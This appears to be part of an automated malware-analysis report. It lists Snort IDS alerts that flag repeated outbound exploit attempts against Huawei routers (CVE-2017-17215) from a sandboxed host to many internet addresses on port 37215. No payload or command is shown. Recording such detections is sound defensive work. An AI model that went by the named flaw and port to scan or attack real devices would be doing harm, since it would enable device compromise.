                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:54472 -> 57.2.111.215:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:54472 -> 57.2.111.215:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:53654 -> 41.135.106.154:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:53654 -> 41.135.106.154:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:43150 -> 197.66.192.62:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:43150 -> 197.66.192.62:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:48712 -> 41.152.215.135:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:48712 -> 41.152.215.135:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:48358 -> 157.133.35.23:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:48358 -> 157.133.35.23:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:52238 -> 41.4.113.224:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:52238 -> 41.4.113.224:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:50346 -> 221.14.147.214:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:50346 -> 221.14.147.214:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:47070 -> 157.23.28.93:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:47070 -> 157.23.28.93:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:60896 -> 157.43.178.90:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:60896 -> 157.43.178.90:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:55212 -> 167.226.60.50:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:55212 -> 167.226.60.50:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:48368 -> 197.78.23.106:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:48368 -> 197.78.23.106:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:34672 -> 50.238.101.54:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:34672 -> 50.238.101.54:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:41616 -> 41.27.132.50:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:41616 -> 41.27.132.50:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:39576 -> 205.5.188.48:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:39576 -> 205.5.188.48:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:58120 -> 74.129.64.111:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:58120 -> 74.129.64.111:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:58918 -> 41.122.176.87:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:58918 -> 41.122.176.87:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:56068 -> 157.192.216.123:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:56068 -> 157.192.216.123:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:45556 -> 122.105.86.215:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:45556 -> 122.105.86.215:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:43226 -> 157.61.158.101:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:43226 -> 157.61.158.101:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:56222 -> 157.127.230.112:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:56222 -> 157.127.230.112:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:57800 -> 157.118.203.59:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:57800 -> 157.118.203.59:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:36400 -> 197.154.124.111:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:36400 -> 197.154.124.111:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:54430 -> 17.87.28.60:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:54430 -> 17.87.28.60:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:36314 -> 157.70.76.195:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:36314 -> 157.70.76.195:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:43424 -> 157.102.232.46:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:43424 -> 157.102.232.46:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:37150 -> 41.255.220.110:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:37150 -> 41.255.220.110:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:50252 -> 119.20.1.240:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:50252 -> 119.20.1.240:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:55278 -> 222.35.243.94:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:55278 -> 222.35.243.94:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:45538 -> 197.240.50.33:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:45538 -> 197.240.50.33:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:50424 -> 197.229.25.11:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:50424 -> 197.229.25.11:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:48524 -> 157.204.251.89:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:48524 -> 157.204.251.89:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:57164 -> 41.111.94.122:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:57164 -> 41.111.94.122:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:39214 -> 197.1.234.221:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:39214 -> 197.1.234.221:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:46692 -> 197.211.195.153:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:46692 -> 197.211.195.153:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:56362 -> 41.75.196.244:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:56362 -> 41.75.196.244:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:44850 -> 197.82.16.255:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:44850 -> 197.82.16.255:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:37892 -> 197.22.120.224:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:37892 -> 197.22.120.224:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:37406 -> 41.253.115.196:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:37406 -> 41.253.115.196:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:48056 -> 1.61.137.124:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:48056 -> 1.61.137.124:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:44032 -> 197.60.10.6:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:44032 -> 197.60.10.6:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:44892 -> 213.3.221.4:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:44892 -> 213.3.221.4:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:58632 -> 41.49.0.166:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:58632 -> 41.49.0.166:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:58472 -> 157.205.187.101:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:58472 -> 157.205.187.101:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:50304 -> 112.145.229.80:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:50304 -> 112.145.229.80:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:33950 -> 41.10.116.54:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:33950 -> 41.10.116.54:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:48188 -> 157.151.201.134:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:48188 -> 157.151.201.134:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:36194 -> 157.118.146.105:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:36194 -> 157.118.146.105:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:43336 -> 66.93.247.101:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:43336 -> 66.93.247.101:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:42180 -> 72.21.246.2:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:42180 -> 72.21.246.2:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:48218 -> 157.203.22.176:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:48218 -> 157.203.22.176:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:35750 -> 197.44.208.178:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:35750 -> 197.44.208.178:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:56596 -> 197.104.30.121:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:56596 -> 197.104.30.121:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:38560 -> 157.105.179.191:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:38560 -> 157.105.179.191:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:44116 -> 4.140.41.134:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:44116 -> 4.140.41.134:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:56834 -> 197.252.255.143:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:56834 -> 197.252.255.143:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:57692 -> 157.205.9.18:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:57692 -> 157.205.9.18:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:36756 -> 41.206.172.218:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:36756 -> 41.206.172.218:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:33312 -> 41.19.104.61:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:33312 -> 41.19.104.61:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:38358 -> 157.3.170.234:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:38358 -> 157.3.170.234:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:57642 -> 181.207.54.45:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:57642 -> 181.207.54.45:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:34842 -> 177.108.32.214:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:34842 -> 177.108.32.214:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:44626 -> 41.78.125.196:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:44626 -> 41.78.125.196:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:55888 -> 197.38.80.232:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:55888 -> 197.38.80.232:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:41914 -> 157.156.79.99:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:41914 -> 157.156.79.99:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:34806 -> 197.218.50.208:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:34806 -> 197.218.50.208:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:58756 -> 35.158.159.64:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:58756 -> 35.158.159.64:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:45282 -> 197.195.14.197:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:45282 -> 197.195.14.197:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:55462 -> 41.168.46.68:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:55462 -> 41.168.46.68:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:37532 -> 197.65.106.151:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:37532 -> 197.65.106.151:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:58980 -> 41.98.148.48:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:58980 -> 41.98.148.48:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:45168 -> 41.76.53.89:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:45168 -> 41.76.53.89:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:42848 -> 197.202.4.215:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:42848 -> 197.202.4.215:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:40838 -> 41.196.114.19:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:40838 -> 41.196.114.19:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:50726 -> 157.188.202.67:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:50726 -> 157.188.202.67:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:50028 -> 41.42.102.15:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:50028 -> 41.42.102.15:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:35282 -> 41.208.121.63:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:35282 -> 41.208.121.63:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:35602 -> 41.46.229.201:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:35602 -> 41.46.229.201:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:37952 -> 157.27.42.36:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:37952 -> 157.27.42.36:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:40546 -> 113.54.226.55:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:40546 -> 113.54.226.55:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:51774 -> 157.159.100.64:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:51774 -> 157.159.100.64:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:57216 -> 192.248.13.228:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:57216 -> 192.248.13.228:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:42966 -> 125.187.54.161:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:42966 -> 125.187.54.161:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:39894 -> 201.77.191.220:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:39894 -> 201.77.191.220:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:45050 -> 157.194.80.112:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:45050 -> 157.194.80.112:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:57766 -> 158.202.44.85:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:57766 -> 158.202.44.85:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:46556 -> 197.223.147.97:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:46556 -> 197.223.147.97:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:42868 -> 197.187.28.139:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:42868 -> 197.187.28.139:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:55630 -> 197.228.184.18:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:55630 -> 197.228.184.18:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:44276 -> 97.164.167.71:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:44276 -> 97.164.167.71:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:53096 -> 41.161.158.114:37215
